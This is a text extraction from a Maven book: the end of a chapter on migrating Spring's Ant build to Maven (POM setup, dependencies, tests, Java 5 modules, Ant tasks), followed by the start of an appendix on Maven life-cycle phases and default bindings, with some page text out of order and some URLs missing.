war. in Spring. spring-parent) • version: this setting should always represent the next release version number appended with .org</url> <organization> <name>The Spring Framework Project</name> </organization> In this parent POM we can also add dependencies such as JUnit. <groupId>com. Recall from previous chapters that during the release process. the main source and test directories are src and test. and ear values should be obvious to you (a pom value means that this project is used for metadata only) The other values are not strictly required.m2book. primary used for documentation purposes. <dependencies> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3. however. which will be used for testing in every module. For this example.Migrating to Maven In the m2 directory.migrating</groupId> <artifactId>spring-parent</artifactId> <version>2. company.0-m1-SNAPSHOT</version> <name>Spring parent</name> <packaging>pom</packaging> <description>Spring Framework</description> <inceptionYear>2002</inceptionYear> <url>. in order to tag the release in your SCM.springframework. respectively. non-snapshot version for a short period of time. you will use com. each module will inherit the following values (settings) from the parent POM. the Spring team would use org. you will need to create a parent POM. 245 . • packaging: the jar. and it should mimic standard package naming conventions to avoid duplicate values. etc. • groupId: this setting indicates your area of influence. You will use the parent POM to store the common configuration settings that apply to all of the modules. as it is our 'unofficial' example version of Spring.mergere..mergere.springframework • artifactId: the setting specifies the name of this module (for example. the version you are developing in order to release.SNAPSHOT – that is.8. Let's begin with these directories. thereby eliminating the requirement to specify the dependency repeatedly across multiple modules.migrating. For example. project. Maven will convert to the definitive.m2book. department.1</version> <scope>test</scope> </dependency> </dependencies> As explained previously.
Include Commons Attributes generated Java sources --> <src path="${commons.tempdir. you will need to append -Dmaven./test</testSourceDirectory> <plugins> <plugin> <groupId>org. Recall from Chapter 2./.3" debug="${debug}" deprecation="false" optimize="false" failonerror="true"> <src path="${src./. your build section will look like this: <build> <sourceDirectory>. deprecation and optimize (false).debug=false to the mvn command (by default this is set to true).classes. and failonerror (true) values. For the debug attribute.attributes.dir}" source="1./src</sourceDirectory> <testSourceDirectory>..dir}"/> <!-. At this point.maven.3)..apache.3</source> <target>1. you can retrieve some of the configuration parameters for the compiler.3</target> </configuration> </plugin> </plugins> </build> 246 .Better Builds with Maven Using the following code snippet from Spring's Ant build script. that Maven automatically manages the classpath from its list of dependencies..3" target="1. For now. you don't have to worry about the commons-attributes generated sources mentioned in the snippet.compiler. <javac destdir="${target. so to specify the required debug function in Maven.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1..src}"/> <classpath refid="all-libs"/> </javac> As you can see these include the source and target compatibility (1. as you will learn about that later in this chapter. These last three properties use Maven's default values. Spring's Ant script uses a debug parameter. so there is no need for you to add the configuration parameters. in the buildmain target.
excludes}"/> </batchtest> </junit> You can extract some configuration information from the previous code: • forkMode=”perBatch” matches with Maven's forkMode parameter with a value of once.testclasses. Maven sets the reports destination directory (todir) to target/surefire-reports.dir}"> <fileset dir="${target.properties files etc take precedence --> <classpath location="${target. haltonfailure and haltonerror settings. this value is read from the project.includes}" excludes="${test. You will need to specify the value of the properties test.includes and test. • • formatter elements are not required as Maven generates both plain text and xml reports.mockclasses.properties file loaded from the Ant script (refer to the code snippet below for details). and this doesn't need to be changed.awt.Must go first to ensure any jndi.dir}" includes="${test. so you will not need to locate the test classes directory (dir). by default.headless=true -XX:MaxPermSize=128m -Xmx128m"/> <!-. You will not need any printsummary. as Maven prints the test summary and stops for any test error or failure.excludes from the nested fileset. Maven uses the default value from the compiler plugin. From the tests target in the Ant script: <junit forkmode="perBatch" printsummary="yes" haltonfailure="yes" haltonerror="yes"> <jvmarg line="-Djava. • • • • • 247 . classpath is automatically managed by Maven from the list of dependencies.Need files loaded as resources --> <classpath location="${test. since the concept of a batch for testing does not exist.testclasses. by default.Migrating to Maven The other configuration that will be shared is related to the JUnit tests.classes.dir}"/> <classpath location="${target.dir}"/> <!-.dir}"/> <classpath location="${target. The nested element jvmarg is mapped to the configuration parameter argLine As previously noted.dir}"/> <classpath refid="all-libs"/> <formatter type="plain" usefile="false"/> <formatter type="xml"/> <batchtest fork="yes" todir="${reports.
plugins</groupId> <artifactId>maven-surefire-plugin</artifactId> <configuration> <forkMode>once</forkMode> <childDelegation>false</childDelegation> <argLine> -Djava. 248 .4 to run you do not need to exclude hibernate3 tests. <plugin> <groupId>org. # Convention is that our JUnit test classes have XXXTests-style names.includes=**/*Tests. # Second exclude needs to be used for JDK. test.class</include> </includes> <excludes> <exclude>**/Abstract*</exclude> </excludes> </configuration> </plugin> The childDelegation option is required to prevent conflicts when running under Java 5 between the XML parser provided by the JDK and the one included in the dependencies in some modules.maven.headless=true -XX:MaxPermSize=128m -Xmx128m </argLine> <includes> <include>**/*Tests.4. Note that it is possible to use another lower JVM to run tests if you wish – refer to the Surefire plugin reference documentation for more information. It makes tests run using the standard classloader delegation instead of the default Maven isolated classloader. which are processed prior to the compilation.apache.excludes=**/Abstract* org/springframework/orm/hibernate3/** The includes and excludes referenced above.1 # being compiled with target JDK 1.5 . due to Hibernate 3. test.class # # Wildcards to exclude among JUnit tests. mandatory when building in JDK 1.excludes=**/Abstract* #test. Since Maven requires JDK 1.4.and generates sources from them that have to be compiled with the normal Java compiler. When building only on Java 5 you could remove that option and the XML parser (Xerces) and APIs (xml-apis) dependencies.awt. Spring's Ant build script also makes use of the commons-attributes compiler in its compileattr and compiletestattr targets.
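While verifying the migrated test configuration, it can also help to run a single test class at a time; the Surefire plugin supports this from the command line. The class name below is only an example taken from the Spring test suite:

mvn test -Dtest=PathMatchingResourcePatternResolverTests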
servlet.mojo</groupId> <artifactId>commons-attributes-maven-plugin</artifactId> <executions> <execution> <configuration> <includes> <include>**/metadata/*.codehaus.attributes. 249 .attributes.web.Compile to a temp directory: Commons Attributes will place Java Source here.java</include> <include>org/springframework/jmx/**/*. Maven handles the source and destination directories automatically. --> <attribute-compiler <fileset dir="${test.Compile to a temp directory: Commons Attributes will place Java Source here.dir}" includes="**/metadata/*.java"/> </attribute-compiler> From compiletestattr: <!-.test}"> <fileset dir="${test. --> <fileset dir="${src. --> <attribute-compiler </attribute-compiler> In Maven. this same function can be accomplished by adding the commons-attributes plugin to the build section in the POM.dir}" includes="org/springframework/aop/**/*.tempdir.java</include> </testIncludes> </configuration> <goals> <goal>compile</goal> <goal>test-compile</goal> </goals> </execution> </executions> </plugin> Later in this chapter you will need to modify these test configurations.dir}" includes="org/springframework/jmx/**/*.src}"> <!-Only the PathMap attribute in the org.Migrating to Maven From compileattr: <!-.java</include> </includes> <testIncludes> <include>org/springframework/aop/**/*.springframework.metadata package currently needs to be shipped with an attribute.handler.
0-m1-SNAPSHOT</version> </parent> <artifactId>spring-core</artifactId> <name>Spring core</name> Again.dir}"> <include name="org/springframework/core/**"/> <include name="org/springframework/util/**"/> </fileset> <manifest> <attribute name="Implementation-Title" value="${spring-title}"/> <attribute name="Implementation-Version" value="${spring-version}"/> <attribute name="Spring-Version" value="${spring-version}"/> </manifest> </jar> From the previous code snippet. As you saw before.mergere. compiler configuration. In each subdirectory. Compiling In this section. which centralizes and maintains information common to the project.3.). since the sources and resources are in the same directory in the current Spring build. However. The following is the POM for the spring-core module. you will start to compile the main Spring source. description. For the resources. in this case the defaults are sufficient. you will need to add a resources element in the build section.dir}/modules/spring-core.jar"> <fileset dir="${target. you need to create the POM files for each of Spring's modules.classes.java files from the resources. and organization name to the values in the POM. 8. JUnit test configuration. Maven will automatically set manifest attributes such as name. tests will be dealt with later in the chapter.m2book.migrating</groupId> <artifactId>spring-parent</artifactId> <version>2. or they will get included in the JAR. you will need to create a POM that extends the parent POM. 250 . setting the files you want to include (by default Maven will pick everything from the resource directory). review the following code snippet from Spring's Ant script. you will need to exclude the *. as those values are inherited from parent POM. <parent> <groupId>com.4.Better Builds with Maven 8. you can determine which classes are included in the JAR and what attributes are written into the JAR's manifest. etc. While manifest entries can also be customized with additional configuration to the JAR plugin. Creating POM files Now that you have the basic configuration shared by all modules (project information. This module is the best to begin with because all of the other modules depend on it. you won't need to specify the version or groupId elements of the current module. To begin. version. where spring-core JAR is created: <jar jarfile="${dist. you will need to tell Maven to pick the correct classes and resources from the core and util packages.
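If you did want to reproduce Spring's extra manifest attributes rather than rely on the defaults, a hedged sketch of that additional JAR plugin configuration is shown below; the entry name mirrors the Ant manifest above, and using the project version as its value is only an assumption:

<plugin>
  <groupId>org.apache.maven.plugins</groupId>
  <artifactId>maven-jar-plugin</artifactId>
  <configuration>
    <archive>
      <manifestEntries>
        <Spring-Version>${project.version}</Spring-Version>
      </manifestEntries>
    </archive>
  </configuration>
</plugin>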
Maven will by default compile everything from the source directory./src</directory> <includes> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </includes> <excludes> <exclude>**/*.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <includes> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </includes> </configuration> </plugin> </plugins> </build> 251 . <build> <resources> <resource> <directory>. you will need to configure the compiler plugin to include only those in the core and util packages.Migrating to Maven For the classes.apache.java</exclude> </excludes> </resource> </resources> <plugins> <plugin> <groupId>org./.maven. because as with resources.. which is inherited from the parent POM..
As an alternative. you now know that you need the Apache Commons Logging library (commons-logging) to be added to the dependencies section in the POM.java:[31. But.commons.\. Specify site:www. beginning with the following: [INFO] -----------------------------------------------------------------------[ERROR] BUILD FAILURE [INFO] -----------------------------------------------------------------------[INFO] Compilation failure C:\dev\m2book\code\migrating\spring\m2\springcore\. you can search the repository using Google.commons.\.24] cannot find symbol symbol : class Log location: class org.apache.ibiblio. From the previous output.core.apache. Regarding the artifactId..\src\org\springframework\core\io\support\PathMatchingResourcePatternResol ver. In the case of commons-logging..apache.34] package org.34] package org. located in the org/apache/commons/logging directory in the repository.apache.org/maven2/commons-logging/commons-logging/.java:[107.. 252 .springframework. you need to check the central repository at ibiblio. what groupid.logging does not exist C:\dev\m2book\code\migrating\spring\m2\springcore\. the convention is to use a groupId that mirrors the package name.logging. You will see a long list of compilation failures. commons-logging groupId would become org.org/maven2 commons logging.support.Better Builds with Maven To compile your Spring build.java:[19.\src\org\springframework\util\xml\SimpleSaxErrorHandler. If you check the repository.commons. for historical reasons some groupId values don't follow this convention and use only the name of the project.logging does not exist C:\dev\m2book\code\migrating\spring\m2\springcore\.ibiblio.34] package org. the option that is closest to what is required by your project.logging does not exist These are typical compiler messages.java:[30. Typically. artifactId and version should we use? For the groupId and artifactId. it's usually the JAR name without a version (in this case commonslogging). caused by the required classes not being on the classpath...io.\src\org\springframework\core\io\support\PathMatchingResourcePatternResol ver.. you can now run mvn compile.\.. you will find all the available versions of commons-logging under. and then choose from the search results.PathMatchingResourcePatternResolver C:\dev\m2book\code\migrating\spring\m2\springcore\.. For example. changing dots to slashes.\src\org\springframework\core\io\support\PathMatchingResourcePatternResol ver. the actual groupId is commons-logging. However.\.commons.
ibiblio. 253 .0.1. So.com/. However. search the ibiblio repository through Google by calculating the MD5 checksum of the JAR file with a program such as md5sum. Continuum and Archiva build platform.jar.org/maven2 to the query. we strongly encourage and recommend that you invest the time at the outset of your migration. component-oriented. to make explicit the dependencies and interrelationships of your projects. For instance.0 distribution based on a preintegrated Maven. we discovered that the commons-beanutils version stated in the documentation is wrong and that some required dependencies are missing from the documentation. you will find that there is documentation for all of Spring's dependencies in readme. has been developed and is available as part of Maestro.txt in the lib directory of the Spring source.ibiblio. there are some other options to try to determine the appropriate versions for the dependencies included in your build: • Check if the JAR has the version in the file name • Open the JAR file and look in the manifest file META-INF/MANIFEST. you could search with: site:). all submodules would use the same dependencies). and then search in Google prepending site:www. the previous directory is the artifactId (hibernate) and the other directories compose the groupId. you have to be careful as the documentation may contain mistakes and/or inaccuracies.Migrating to Maven With regard the version. with the slashes changed to dots (org.MF • For advanced users. using a Web interface. through inheritance. although you could simply follow the same behavior used in Ant (by adding all the dependencies in the parent POM so that. You can use this as a reference to determine the versions of each of the dependencies. For more information on Maestro please see:. explicit dependency management is one of the biggest benefits of Maven once you have invested the effort upfront. When needed. Maestro is an Apache License 2.hibernate) An easier way to search for dependencies. <dependencies> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1. For example. during the process of migrating Spring to Maven.ibiblio.md5 You can see that the last directory is the version (3. For details on Maven Archiva (the artifact repository manager) refer to the Maven Archiva project for details)6. 6 Maven Archiva is part of Mergere Maestro. modular projects that are easier to maintain in the long term. for the hibernate3.org/maven2 78d5c38f1415efc64f7498f828d8069a The search will return: provided with Spring under lib/hibernate. Doing so will result in cleaner.1/hibernate-3. While adding dependencies can be the most painful part of migrating to Maven.org/maven2/org/hibernate/hibernate/3.4</version> </dependency> </dependencies> Usually you will convert your own project. so you will have first hand knowledge about the dependencies and versions used.mergere.
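The checksum itself can be produced from the command line. For the hibernate3.jar example above, the invocation would be along these lines, run from Spring's lib/hibernate directory:

md5sum hibernate3.jar

The value it prints is what you then paste into the site-restricted Google query.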
5.this time all of the sources for spring-core will compile. we will cover how to run the tests.Better Builds with Maven Running again mvn compile and repeating the process previously outlined for commons-logging. Compiling Tests Setting the test resources is identical to setting the main resources.. <testResources> <testResource> <directory>. 8.1</version> </dependency> <dependency> <groupId>log4j</groupId> <artifactId>log4j</artifactId> <version>1. Now. setting which test resources to use. <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3. with the exception of changing the location from which the element name and directory are pulled.java</exclude> </excludes> </testResource> </testResources> 254 .properties file required for logging configuration. so log4j will not be included in other projects that depend on this.9</version> <optional>true</optional> </dependency> Notice that log4j is marked as optional.5. and setting the JUnit test sources to compile. Optional dependencies are not included transitively. After compiling the tests. 8. and it is just for the convenience of the users.2. Using the optional tag does not affect the current project. you may decide to use another log implementation. For the first step./test</directory> <includes> <include>log4j.1. Testing Now you're ready to compile and run the tests. run mvn compile again . you will repeat the previous procedure for the main classes./. This is because in other projects.properties</include> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </includes> <excludes> <exclude>**/*. you will need to add the log4j.. you will notice that you also need Apache Commons Collections (aka commons-collections) and log4j. In addition.
4</version> <scope>test</scope> </dependency> The scope is set to test. as well. as all the test classes compile correctly now.mock. not tests.Migrating to Maven Setting the test sources for compilation follows the same procedure.springframework. as before. in order to compile the tests: <dependency> <groupId>javax. <testIncludes> <include>org/springframework/core/**</include> <include>org/springframework/util/**</include> </testIncludes> You may also want to check the Log4JConfigurerTests. Inside the mavencompiler-plugin configuration. To exclude test classes in Maven. org. As a result. Therefore. add the testExcludes element to the compiler configuration as follows. you will get compilation errors. In other words. if spring-core depends on spring-beans and spring-beans depends on spring-core. we cannot add a dependency from spring-core without creating a circular dependency. It may appear initially that spring-core depends on spring-mock.java</exclude> <exclude>org/springframework/util/SerializationTestUtils. you will see the following error: package javax. if you try to compile the test classes by running mvn test-compile.springframework.java</exclude> <exclude>org/springframework/util/ClassUtilsTests.servlet</groupId> <artifactId>servlet-api</artifactId> <version>2.beans packages are missing. but rather require other modules to be present. spring-web and spring-beans modules. you will need to add the testIncludes element.servlet does not exist This means that the following dependency must be added to the POM. which one do we build first? Impossible to know.java</exclude> <exclude>org/springframework/util/ReflectionUtilsTests. <testExcludes> <exclude>org/springframework/util/comparator/ComparatorTests.springframework.java</exclude> <exclude>org/springframework/util/ObjectUtilsTests. depend on classes from springcore.java</exclude> <exclude>org/springframework/core/io/ResourceTests. but this time there is a special case where the compiler complains because some of the classes from the org. when you run mvn test-compile. you will see that their main classes. it makes sense to exclude all the test classes that reference other modules from this one and include them elsewhere. Now. 255 . If you run mvn test-compile again you will have a successful build.java</exclude> </testExcludes> Now. So.web and org.java class for any hard codes links to properties files and change them accordingly. the key here is to understand that some of the test classes are not actually unit tests for springcore. as this is not needed for the main sources. but if you try to compile those other modules.
springframework. for the test class that is failing org.aopalliance package is inside the aopallience JAR.io. Failures: 1. However. as it will process all of the previous phases of the build life cycle (generate sources. The first section starts with java.core. Failures: 1.springframework.core. This indicates that there is something missing in the classpath that is required to run the tests.0</version> <scope>test</scope> </dependency> Now run mvn test again.015 sec <<<<<<<< FAILURE !! This output means that this test has logged a JUnit failure and error. so to resolve the problem add the following to your POM <dependency> <groupId>aopalliance</groupId> <artifactId>aopalliance</artifactId> <version>1.5.2. Within this file.Better Builds with Maven 8. Time elapsed: 0.FileNotFoundException: class path resource [org/aopalliance/] cannot be resolved to URL because it does not exist. you will find the following: [surefire] Running org.support. you will get the following error report: Results : [surefire] Tests run: 113. run tests. You will get the following wonderful report: [INFO] -----------------------------------------------------------------------[INFO] BUILD SUCCESSFUL [INFO] ------------------------------------------------------------------------ The last step in migrating this module (spring-core) from Ant to Maven. compile.PathMatchingResourcePatternResolverTe sts. This command can be used instead most of the time. [INFO] ------------------------------------------------------------------------ Upon closer examination of the report output. etc. is to run mvn install to make the resulting JAR available to other projects in your local Maven repository. there is a section for each failed test called stacktrace. simply requires running mvn test. when you run this command.txt. To debug the problem. Errors: 1. you will need to check the test logs under target/surefire-reports. compile tests.io.) 256 .support.PathMatchingResourcePatternResolverTests [surefire] Tests run: 5. The org. Errors: 1 [INFO] -----------------------------------------------------------------------[ERROR] BUILD ERROR [INFO] -----------------------------------------------------------------------[INFO] There are test failures.io. Running Tests Running the tests in Maven.
For instance.groupId}: groupId of the current POM being built For example. you can refer to spring-core from spring-beans with the following.version}: version of the current POM being built ${project.4</version> </dependency> </dependencyManagement> The following are some variables that may also be helpful to reduce duplication: • • ${project.6.6. In the same way. you will find that you are repeating yourself. 8. If you follow the order of the modules described at the beginning of the chapter you will be fine. and remove the versions from the individual modules (see Chapter 3 for more information). move these configuration settings to the parent POM instead.groupId}</groupId> <artifactId>spring-core</artifactId> <version>${project.version}</version> </dependency> 257 . instead of repeatedly adding the same dependency version information to each module. Using the parent POM to centralize this information makes it possible to upgrade a dependency version across all sub-projects from a single location. Avoiding Duplication As soon as you begin migrating the second module. That way. you will be adding the Surefire plugin configuration settings repeatedly for each module that you convert. To avoid duplication. See figure 8-1 to get the overall picture of the interdependencies between the Spring modules. otherwise you will find that the main classes from some of the modules reference classes from modules that have not yet been built. since they have the same groupId and version: <dependency> <groupId>${project. <dependencyManagement> <dependencies> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1. Other Modules Now that you have one module working it is time to move on to the other modules. use the parent POM's dependencyManagement section to specify this information once.1.Migrating to Maven 8. each of the modules will be able to inherit the required Surefire configuration.0.
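To make the dependencyManagement point concrete, a module that inherits from the parent shown above can then declare the managed dependency without repeating the version; a minimal sketch:

<dependencies>
  <dependency>
    <groupId>commons-logging</groupId>
    <artifactId>commons-logging</artifactId>
  </dependency>
</dependencies>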
Generally with Maven. this can cause previously-described cyclic dependencies problem. First. they will need to run them under Java 5. By splitting them into different modules. Although it is typically not recommended. and spring-web-mock. Building Java 5 Classes Some of Spring's modules include Java 5 classes from the tiger folder.maven. you can use it as a dependency for other components. with only those classes related to spring-context module. how can the Java 1.6. by specifying the test-jar type. attempting to use one of the Java 5 classes under Java 1.6. you can split Spring's mock classes into spring-context-mock.5 sources be added? To do this with Maven. that a JAR that contains the test classes is also installed in the repository: <plugin> <groupId>org.version}</version> <type>test-jar</type> <scope>test</scope> </dependency> A final note on referring to test classes from other modules: if you have all of Spring's mock classes inside the same module. So. As the compiler plugin was earlier configured to compile with Java 1. you will need to create a new spring-beans-tiger module.groupId}</groupId> <artifactId>spring-beans</artifactId> <version>${project. To eliminate this problem. you need to create a new module with only Java 5 classes instead of adding them to the same module and mixing classes with different requirements. any users. be sure to put that JAR in the test scope as follows: <dependency> <groupId>${project. 8. users will know that if they depend on the module composed of Java 5 classes.Better Builds with Maven 8.4.2.plugins</groupId> <artifactId>maven-jar-plugin</artifactId> <executions> <execution> <goals> <goal>test-jar</goal> </goals> </execution> </executions> </plugin> Once that JAR is installed. 258 . Referring to Test Classes from Other Modules If you have tests from one component that refer to tests from other modules. particularly in light of transitive dependencies. in this case it is necessary to avoid refactoring the test source code.3 and some compiled for Java 5 in the same JAR. make sure that when you run mvn install. would experience runtime errors. it's easier to deal with small modules.apache. there is a procedure you can use.3 compatibility. However. with only those classes related to spring-web.3.3 or 1. Consider that if you include some classes compiled for Java 1.
the Java 5 modules will share a common configuration for the compiler. and then a directory for each one of the individual tiger modules.Migrating to Maven As with the other modules that have been covered. as follows: Figure 8-3: A tiger module directory The final directory structure should appear as follows: Figure 8-4: The final directory structure 259 . The best way to split them is to create a tiger folder with the Java 5 parent POM.>..apache. with all modules In the tiger POM.maven... you will need to add a module entry for each of the directories./tiger/src</sourceDirectory> <testSourceDirectory>./.5</target> </configuration> </plugin> </plugins> </build> 260 ././tiger/test</testSourceDirectory> <plugins> <plugin> <groupId>org.Better Builds with Maven Figure 8-5: Dependency relationship./.plugins</groupId> <artifactId>maven-compiler-plugin</artifactId> <configuration> <source>1./....5</source> <target>1.
Maven can call Ant tasks directly from a POM using the maven-antrun-plugin.springframework. you need to use the Ant task in the spring-remoting module to use the RMI compiler.classes.RmiInvocationWrapper" iiop="true"> <classpath refid="all-libs"/> </rmic> 261 .RmiInvocationWrapper"/> <rmic base="${target. In this case. but to still be able to build the other modules when using Java 1.remoting.5</jdk> </activation> <modules> <module>tiger</module> </modules> </profile> </profiles> 8. you just need a new module entry for the tiger folder. Using Ant Tasks From Inside Maven In certain migration cases. <profiles> <profile> <id>jdk1. with the Spring migration.classes. this is: <rmic base="${target.dir}" classname="org.4.6.5</id> <activation> <jdk>1. you may find that Maven does not have a plugin for a particular task or an Ant target is so small that it may not be worth creating a new plugin.Migrating to Maven In the parent POM.dir}" classname="org.rmi.remoting.rmi. From Ant.5 JDK.4 you will add that module in a profile that will be triggered only when using 1. For example.springframework.
add: <plugin> <groupId>org. stub and tie classes from them. To complete the configuration.home}/.jar</systemPath> </dependency> </dependencies> </plugin> As shown in the code snippet above. and required by the RMI task.compile.directory} and maven.directory}/classes" classname="org.remoting.build.Better Builds with Maven To include this in Maven build.classpath"/> </rmic> </tasks> </configuration> <goals> <goal>run</goal> </goals> </execution> </executions> <dependencies> <dependency> <groupId>com. So.sun</groupId> <artifactId>tools</artifactId> <scope>system</scope> <version>1.RmiInvocationWrapper" iiop="true"> <classpath refid="maven.4</version> <systemPath>${java..apache.RmiInvocationWrapper"/> <rmic base="${project.build. In this case./lib/tools. the most appropriate phase in which to run this Ant task is in the processclasses phase.springframework.rmi.build. will take the compiled classes and generate the rmi skeleton. which applies to that plugin only.plugins</groupId> <artifactId>maven-antrun-plugin</artifactId> <executions> <execution> <phase>process-classes</phase> <configuration> <tasks> <echo>Running rmic</echo> <rmic base="${project.compile.directory}/classes" classname="org. 262 . you will need to determine when Maven should run the Ant task.maven.jar above. such as ${project.remoting. there are some references available already. the rmic task. such as the reference to the tools.rmi.classpath. There are also references for anything that was added to the plugin's dependencies section. which is a classpath reference constructed from all of the dependencies in the compile scope or lower. which is bundled with the JDK.springframework.
6. such as springaspects.html.apache. Sun's Activation Framework and JavaMail are not redistributable from the repository due to constraints in their licenses. These issues were shared with the Spring developer community and are listed below: • Moving one test class. There is some additional configuration required for some modules. You can then install them in your local repository with the following command. 8. which uses AspectJ for weaving the classes. NamespaceHandlerUtilsTests. special cases that must be handled. You may need to download them yourself from the Sun site or get them from the lib directory in the example code for this chapter.3.6.Migrating to Maven 8. For more information on dealing with this issue.2 -Dpackaging=jar You will only need to do this process once for all of your projects or you may use a corporate repository to share them across your organization. as these test cases will not work in both Maven and Ant. Some Special Cases In addition to the procedures outlined previously for migrating Spring to Maven.jar -DgroupId=javax.mail -DartifactId=mail -Dversion=1. to install JavaMail: mvn install:install-file -Dfile=mail. there are two additional. which used relative paths in Log4JConfigurerTests class. For example.5. 263 . see.. Using classpath resources is recommended over using file system resources. These can be viewed in the example code. mvn install:install-file -Dfile=<path-to-file> -DgroupId=<group-id> -DartifactId=<artifact-id> -Dversion=<version> -Dpackaging=<packaging> For instance.6. Non-redistributable Jars You will find that some of the modules in the Spring build depend on JARs that are not available in the Maven central repository.
these would move from the original test folder to src/test/java and src/test/resources respectively for Java sources and other files .you can delete that 80 MB lib folder. Finally. you would move all Java files under org/springframework/core and org/springframework/util from the original src folder to the module's folder src/main/java. you would eliminate the need to include and exclude sources and resources “by hand” in the POM files as shown in this chapter. The same for tests. you can realize Maven' other benefits . as Maven downloads everything it needs and shares it across all your Maven projects automatically . reports. and quality metrics. In the case of the Spring example. Restructuring the Code If you do decide to use Maven for your project. create JARs. By adopting Maven's standard directory structure. compile and test the code. Summary By following and completing this chapter. ObjectUtilsTests. Once you decide to switch completely to Maven. At the same time.Better Builds with Maven 8. 264 . you will be able to keep your current build working. reducing its size by two-thirds! 8. you will be able to take an existing Ant-based build. and install those JARs in your local repository using Maven. Maven can eliminate the requirement of storing jars in a source code management system. for the spring-core module.just remember not to move the excluded tests (ComparatorTests. SerializationTestUtils and ResourceTests). By doing this. ClassUtilsTests. For example.advantages such as built-in project documentation generation. in addition to the improvements to your build life cycle.7. Now that you have seen how to do this for Spring. ReflectionUtilsTests. you can apply similar concepts to your own Ant based build. you will be able to take advantage of the benefits of adopting Maven's standard directory structure.8. split it into modular components (if needed). Once you have spent this initial setup time Maven. you can simplify the POM significantly. All of the other files under those two packages would go to src/main/resources. it it highly recommended that you go through the restructuring process to take advantage of the many timesaving and simplifying conventions within Maven.
I'll try not to take that personally. All systems automated and ready. Scott. A chimpanzee and two trainees could run her! Kirk: Thank you.Appendix A: Resources for Plugin Developers Appendix A: Resources for Plugin Developers In this appendix you will find: • Maven's Life Cycles • Mojo Parameter Expressions • Plugin Metadata Scotty: She's all yours. Mr. .Star Trek 265 . sir.
initialize – perform any initialization steps required before the main part of the build can start.1.Better Builds with Maven A. For example. This is necessary to accommodate the inevitable variability of requirements for building different types of projects. and the content of the current set of POMs to be built is valid. generate-test-sources – generate compilable unit test code from other source formats. A. In other words. process-classes – perform any post-processing of the binaries produced in the preceding step. It continues by describing the mojos bound to the default life cycle for both the jar and maven-plugin packagings. as when using Aspect-Oriented Programming techniques. archiving it into a jar. performing any associated tests. corresponding to the three major activities performed by Maven: building a project from source. along with a short description for the mojos which should be bound to each. etc. 8. along with a summary of bindings for the jar and maven-plugin packagings. For the default life cycle. 4. This may include copying these resources into the target classpath directory in a Java build. It begins by listing the phases in each life cycle. 6. compile – compile source code into binary form. 3. Life-cycle phases The default life cycle is executed in order to perform a traditional build. generate-resources – generate non-code resources (such as configuration files. process-resources – perform any modification of non-code resources necessary.) from other source formats. in the target output location. validate – verify that the configuration of Maven. mojo-binding defaults are specified in a packaging-specific manner. 2. this section will describe the mojos bound by default to the clean and site life cycles. It contains the following phases: 1. The default Life Cycle Maven provides three life cycles. generate-sources – generate compilable code from other source formats. This section contains a listing of the phases in the default life cycle. and generating a project web site. 7. 9. cleaning a project of the files generated by a build. a mojo may apply source code patches here.1. Maven's Life Cycles Below is a discussion of Maven's three life cycles and their default mappings. such as instrumentation or offline code-weaving. Finally. and distributing it into the Maven repository system. 266 . it takes care of compiling the project's code. 5. process-sources – perform any source modification processes necessary to prepare the code for compilation.1.
16. process-test-resources – perform any modification of non-code testing resources necessary. a mojo may apply source code patches here. generate-test-resources – generate non-code testing resources (such as configuration files. install – install the distributable archive into the local Maven repository. 17. deploy – deploy the distributable archive into the remote Maven repository configured in the distributionManagement section of the POM. 11. before it is available for installation or deployment.Appendix A: Resources for Plugin Developers 10. preintegration-test – setup the integration testing environment for this project. test – execute unit tests on the application compiled and assembled up to step 8 above. test-compile – compile unit test source code into binary form. etc.) from other source formats. in the testing target output location. 14. package – assemble the tested application code and resources into a distributable archive. 18. 15. 21. This may include copying these resources into the testing target classpath location in a Java build. verify – verify the contents of the distributable archive. 12. post-integration-test – return the environment to its baseline form after executing the integration tests in the preceding step. For example. 13. 267 . using the environment configured in the preceding step. 19. 20. integration-test – execute any integration tests defined for this project. process-test-sources – perform any source modification processes necessary to prepare the unit test code for compilation. This could involve removing the archive produced in step 15 from the application server used to test it. This may involve installing the archive from the preceding step into some sort of application server.
Bindings for the jar packaging

Below are the default life-cycle bindings for the jar packaging. Alongside each, you will find a short description of what that mojo does.

- process-resources: resources (maven-resources-plugin) – Copy non-source-code resources to the staging directory for jar creation. Filter variables if necessary.
- compile: compile (maven-compiler-plugin) – Compile project source code to the staging directory for jar creation.
- process-test-resources: testResources (maven-resources-plugin) – Copy non-source-code test resources to the test output directory for unit-test compilation. Filter variables if necessary.
- test-compile: testCompile (maven-compiler-plugin) – Compile unit-test source code to the test output directory.
- test: test (maven-surefire-plugin) – Execute project unit tests.
- package: jar (maven-jar-plugin) – Create a jar archive from the staging directory.
- install: install (maven-install-plugin) – Install the jar archive into the local Maven repository.
- deploy: deploy (maven-deploy-plugin) – Deploy the jar archive to a remote Maven repository.
Bindings for the maven-plugin packaging

The maven-plugin project packaging behaves in almost the same way as the more common jar packaging. Indeed, maven-plugin artifacts are in fact jar files. As such, they undergo the same basic processes of marshaling non-source-code resources, compiling source code, testing, packaging, and the rest. However, the maven-plugin packaging also introduces a few new mojo bindings:

- generate-resources: descriptor (maven-plugin-plugin) – Extract and format the metadata for the mojos within, and generate a plugin descriptor.
- package: addPluginArtifactMetadata (maven-plugin-plugin) – Integrate current plugin information with plugin search metadata.
- install: updateRegistry (maven-plugin-plugin) – Update the plugin registry, if one exists, to reflect the new plugin installed in the local repository and metadata references to the latest plugin version.
A.1.2. The clean Life Cycle

This life cycle is executed in order to restore a project back to some baseline state – usually, the state of the project before it was built. Maven provides a set of default mojo bindings for this life cycle, effective for all POM packagings, which perform the most common tasks involved in cleaning a project. Below is a listing of the phases in the clean life cycle, along with a summary of the default bindings.

Life-cycle phases

The clean life cycle contains the following phases:

1. pre-clean – execute any setup or initialization procedures to prepare the project for cleaning
2. clean – remove all files that were generated during another build process
3. post-clean – finalize the cleaning process

Default life-cycle bindings

Below are the clean life-cycle bindings for the jar packaging. Alongside each, you will find a short description of what that mojo does.

Table A-3: The clean life-cycle bindings for the jar packaging

